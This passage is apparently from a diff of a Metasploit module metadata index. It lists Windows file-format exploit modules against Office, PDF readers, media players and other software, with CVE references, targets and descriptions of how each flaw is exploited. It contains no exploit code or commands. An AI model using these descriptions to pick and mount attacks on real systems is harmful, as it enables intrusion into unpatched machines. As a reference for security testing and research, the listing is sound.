However, based on our testing, the most reliable setup is on Windows\n platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other\n setups such as using Office 2010 SP1 might be less stable, and may end up with a\n crash due to a failure in the CPackage::CreateTempFileName function.", + "references": [ + "CVE-2014-6352", + "MSB-MS14-064", + "BID-70690", + "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 / Office 2010 SP2 / Office 2013" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_064_packager_run_as_admin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms15_020_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-10", + "type": "exploit", + "author": [ + "Michael Heerklotz", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This module creates the required files to exploit the vulnerability. They must be\n uploaded to an UNC path accessible by the target. 
This module has been tested successfully\n on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", + "references": [ + "CVE-2015-0096", + "MSB-MS15-020", + "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", + "URL-https://github.com/rapid7/metasploit-framework/pull/4911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms15_020_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms15_100_mcl_exe": { + "name": "MS15-100 Microsoft Windows Media Center MCL Vulnerability", + "fullname": "exploit/windows/fileformat/ms15_100_mcl_exe", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-09-08", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits a vulnerability in Windows Media Center. 
By supplying\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.", + "references": [ + "CVE-2015-2509", + "MSB-MS15-100" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms15_100_mcl_exe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms_visual_basic_vbp": { + "name": "Microsoft Visual Basic VBP Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms_visual_basic_vbp", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-09-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Microsoft Visual\n Basic 6.0. 
When a specially crafted vbp file containing a long\n reference line, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2007-4776", + "OSVDB-36936", + "BID-25629" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 English" + ], + "mod_time": "2021-02-13 04:10:13 +0000", + "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms_visual_basic_vbp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mswin_tiff_overflow": { + "name": "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow", + "fullname": "exploit/windows/fileformat/mswin_tiff_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-11-05", + "type": "exploit", + "author": [ + "Unknown", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Microsoft's Tagged Image File Format.\n It was originally discovered in the wild, targeting Windows XP and Windows Server 2003\n users running Microsoft Office, specifically in the Middle East and South Asia region.\n\n The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a\n drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,\n and stored in the EAX register. The 32-bit register will run out of storage space to\n represent the large value, which ends up being 0, but it still gets pushed as a\n dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a\n chunk anyway with size 0, and the address of this chunk is used as the destination buffer\n of a memcpy function, where the source buffer is the EXIF data (an extended image format\n supported by TIFF), and is also user-controlled. 
A function pointer in the chunk returned\n by HeapAlloc will end up being overwritten by the memcpy function, and then later used\n in OGL!GdipCreatePath. By successfully controlling this function pointer, and the\n memory layout using ActiveX, it is possible to gain arbitrary code execution under the\n context of the user.", + "references": [ + "CVE-2013-3906", + "MSB-MS13-096", + "OSVDB-99376", + "URL-http://technet.microsoft.com/en-us/security/advisory/2896666", + "URL-http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 with Office Standard 2010" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mswin_tiff_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/msworks_wkspictureinterface": { + "name": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution", + "fullname": "exploit/windows/fileformat/msworks_wkspictureinterface", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-11-28", + "type": "exploit", + "author": [ + "dean " + ], + "description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. 
Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.", + "references": [ + "CVE-2008-1898", + "OSVDB-44458" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2-SP3 IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/msworks_wkspictureinterface", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mymp3player_m3u": { + "name": "Steinberg MyMP3Player 3.0 Buffer Overflow", + "fullname": "exploit/windows/fileformat/mymp3player_m3u", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-03-18", + "type": "exploit", + "author": [ + "n3w7u", + "m_101" + ], + "description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. 
When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-64580", + "EDB-11791" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal", + "Windows Universal (SEH)", + "Windows XP SP3 French" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mymp3player_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/netop": { + "name": "NetOp Remote Control Client 9.5 Buffer Overflow", + "fullname": "exploit/windows/fileformat/netop", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-28", + "type": "exploit", + "author": [ + "Ruben Alejandro \"chap0\"" + ], + "description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n When opening a .dws file containing a specially crafted string longer then 520\n characters will allow an attacker to execute arbitrary code.", + "references": [ + "OSVDB-72291", + "EDB-17223" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/netop.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/netop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/nitro_reader_jsapi": { + "name": "Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution", + "fullname": "exploit/windows/fileformat/nitro_reader_jsapi", + "aliases": [], + 
"rank": 600, + "disclosure_date": "2017-07-24", + "type": "exploit", + "author": [ + "mr_me ", + "bcoles ", + "sinn3r " + ], + "description": "This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro\n PDF Reader version 11. The saveAs() Javascript API function allows for writing\n arbitrary files to the file system. Additionally, the launchURL() function allows\n an attacker to execute local files on the file system and bypass the security dialog\n\n Note: This is 100% reliable.", + "references": [ + "CVE-2017-7442", + "URL-http://srcincite.io/advisories/src-2017-0005/", + "URL-https://blogs.securiteam.com/index.php/archives/3251" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/nitro_reader_jsapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/fileformat/nuance_pdf_launch_overflow": { + "name": "Nuance PDF Reader v6.0 Launch Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/nuance_pdf_launch_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-08", + "type": "exploit", + "author": [ + "corelanc0d3r ", + "rick2600" + ], + "description": "This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. 
This results in overwriting a structured exception handler record.\n This exploit does not use javascript.", + "references": [ + "OSVDB-68514", + "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Nuance PDF Reader v6.x (XP SP3)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/nuance_pdf_launch_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_dde_delivery": { + "name": "Microsoft Office DDE Payload Delivery", + "fullname": "exploit/windows/fileformat/office_dde_delivery", + "aliases": [], + "rank": 0, + "disclosure_date": "2017-10-09", + "type": "exploit", + "author": [ + "mumbai" + ], + "description": "This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.", + "references": [ + "URL-https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563", + "URL-https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/office_dde_delivery.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_dde_delivery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_excel_slk": { + "name": 
"Microsoft Excel .SLK Payload Delivery", + "fullname": "exploit/windows/fileformat/office_excel_slk", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-07", + "type": "exploit", + "author": [ + "Carter Brainerd", + "Stan Hegt", + "Pieter Ceelen" + ], + "description": "This module generates a download and execute Powershell\n command to be placed in an .SLK Excel spreadsheet.\n When executed, it will retrieve a payload via HTTP\n from a web server. When the file is opened, the\n user will be prompted to \"Enable Content.\" Once\n this is pressed, the payload will execute.", + "references": [ + "URL-https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files", + "URL-https://www.twitter.com/StanHacked/status/1049047727403937795", + "URL-http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Excel" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/office_excel_slk.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_excel_slk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_ms17_11882": { + "name": "Microsoft Office CVE-2017-11882", + "fullname": "exploit/windows/fileformat/office_ms17_11882", + "aliases": [], + "rank": 0, + "disclosure_date": "2017-11-15", + "type": "exploit", + "author": [ + "mumbai", + "embedi" + ], + "description": "Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. 
The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.", + "references": [ + "CVE-2017-11882", + "URL-http://web.archive.org/web/20211201000500/https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about", + "URL-https://github.com/embedi/CVE-2017-11882" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_ms17_11882", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_ole_multiple_dll_hijack": { + "name": "Office OLE Multiple DLL Side Loading Vulnerabilities", + "fullname": "exploit/windows/fileformat/office_ole_multiple_dll_hijack", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-08", + "type": "exploit", + "author": [ + "Yorick Koster" + ], + "description": "Multiple DLL side loading vulnerabilities were found in various COM components.\n These issues can be exploited by loading various these components as an embedded\n OLE object. When instantiating a vulnerable object Windows will try to load one\n or more DLLs from the current working directory. If an attacker convinces the\n victim to open a specially crafted (Office) document from a directory also\n containing the attacker's DLL file, it is possible to execute arbitrary code with\n the privileges of the target user. 
This can potentially result in the attacker\n taking complete control of the affected system.", + "references": [ + "CVE-2015-6132", + "CVE-2015-6128", + "CVE-2015-6133", + "CVE-2016-0041", + "CVE-2016-0100", + "CVE-2016-3235", + "MSB-MS15-132", + "MSB-MS16-014", + "MSB-MS16-025", + "MSB-MS16-041", + "MSB-MS16-070", + "URL-https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html", + "URL-https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html", + "URL-https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "All", + "COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)", + "Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)", + "Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)", + "Shutdown UX / Windows 10 / Office 2016 (MS15-132)", + "MapUpdateTask Tasks / Windows 10 / 
Office 2016 (MS16-014)", + "Microsoft Visio 2010 / Windows 7 (MS16-070)", + "Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)", + "OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)", + "Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)", + "NPS Datastore server / Windows Vista / Office 2010 (MS16-014)", + "BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_ole_multiple_dll_hijack", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_word_hta": { + "name": "Microsoft Office Word Malicious Hta Execution", + "fullname": "exploit/windows/fileformat/office_word_hta", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-04-14", + "type": "exploit", + "author": [ + "Haifei Li", + "ryHanson", + "wdormann", + "DidierStevens", + "vysec", + "Nixawk", + "sinn3r " + ], + "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. 
This module was created by reversing a public\n malware sample.", + "references": [ + "CVE-2017-0199", + "URL-https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/", + "URL-https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html", + "URL-https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/", + "URL-https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", + "URL-https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html", + "URL-https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf", + "URL-https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/", + "URL-https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100", + "URL-https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/", + "URL-https://www.microsoft.com/en-us/download/details.aspx?id=10725", + "URL-https://msdn.microsoft.com/en-us/library/dd942294.aspx", + "URL-https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Word" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/office_word_hta.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_word_hta", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/openoffice_ole": { + "name": "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow", + 
"fullname": "exploit/windows/fileformat/openoffice_ole", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-04-17", + "type": "exploit", + "author": [ + "Marsu ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on\n Microsoft Windows XP SP3.\n\n By supplying a OLE file with a malformed DocumentSummaryInformation stream, an\n attacker can gain control of the execution flow, which results arbitrary code\n execution under the context of the user.", + "references": [ + "CVE-2008-0320", + "OSVDB-44472", + "BID-28819", + "EDB-5584", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/openoffice_ole", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/orbit_download_failed_bof": { + "name": "Orbit Downloader URL Unicode Conversion Overflow", + "fullname": "exploit/windows/fileformat/orbit_download_failed_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-04-03", + "type": "exploit", + "author": [ + "Diego Juarez", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in Orbit Downloader.\n The vulnerability is due to Orbit converting a URL ascii string to unicode\n in an insecure way with MultiByteToWideChar.\n The vulnerability is exploited with a specially crafted metalink file that\n should be opened with Orbit through the \"File->Add Metalink...\" option.", + "references": [ 
+ "BID-28541", + "OSVDB-44036", + "CVE-2008-1602", + "URL-http://www.coresecurity.com/content/orbit-downloader" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Orbit Downloader 6.4 on Windows XP SP3", + "Orbit Downloader 6.4 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/orbit_download_failed_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/orbital_viewer_orb": { + "name": "Orbital Viewer ORB File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/orbital_viewer_orb", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-27", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in David Manthey's\n Orbital Viewer. When processing .ORB files, data is read from file into\n a fixed-size stack buffer using the fscanf function. Since no bounds\n checking is done, a buffer overflow can occur. 
Attackers can execute\n arbitrary code by convincing their victim to open an ORB file.", + "references": [ + "BID-38436", + "OSVDB-62580", + "CVE-2010-0688", + "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/", + "EDB-11581" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Orbital Viewer 1.04 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/orbital_viewer_orb.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/orbital_viewer_orb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ovf_format_string": { + "name": "VMWare OVF Tools Format String Vulnerability", + "fullname": "exploit/windows/fileformat/ovf_format_string", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-08", + "type": "exploit", + "author": [ + "Jeremy Brown", + "juan vazquez " + ], + "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. 
The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", + "references": [ + "CVE-2012-3569", + "OSVDB-87117", + "BID-56468", + "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VMWare OVF Tools 2.1 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/ovf_format_string.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ovf_format_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/proshow_cellimage_bof": { + "name": "ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/proshow_cellimage_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-20", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n An attacker must send the file to victim and the victim must open the file.", + "references": [ + "CVE-2009-3214", + "OSVDB-57226", + "EDB-9483", + "EDB-9519" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/proshow_cellimage_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/proshow_load_bof": { + "name": "Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow", + "fullname": 
"exploit/windows/fileformat/proshow_load_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-06", + "type": "exploit", + "author": [ + "Julien Ahrens", + "mr.pr0n", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "OSVDB-83745", + "EDB-19563", + "EDB-20036", + "URL-http://security.inshell.net/advisory/30" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/proshow_load_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/publishit_pui": { + "name": "Publish-It PUI Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/publishit_pui", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-05", + "type": "exploit", + "author": [ + "Daniel Kazimirow", + "Andrew Smith \"jakx_\"" + ], + "description": "This module exploits a stack based buffer overflow in Publish-It when\n processing a specially crafted .PUI file. 
This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Publish-It to open a malicious .PUI file.", + "references": [ + "OSVDB-102911", + "CVE-2014-0980", + "EDB-31461" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Publish-It 3.6d" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/publishit_pui.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/publishit_pui", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/real_networks_netzip_bof": { + "name": "Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability", + "fullname": "exploit/windows/fileformat/real_networks_netzip_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-01-30", + "type": "exploit", + "author": [ + "C4SS!0 G0M3S", + "TecR0c " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.", + "references": [ + "OSVDB-83436", + "EDB-16083", + "BID-46059", + "URL-http://proforma.real.com" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3", + "Windows 7/Windows Vista" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 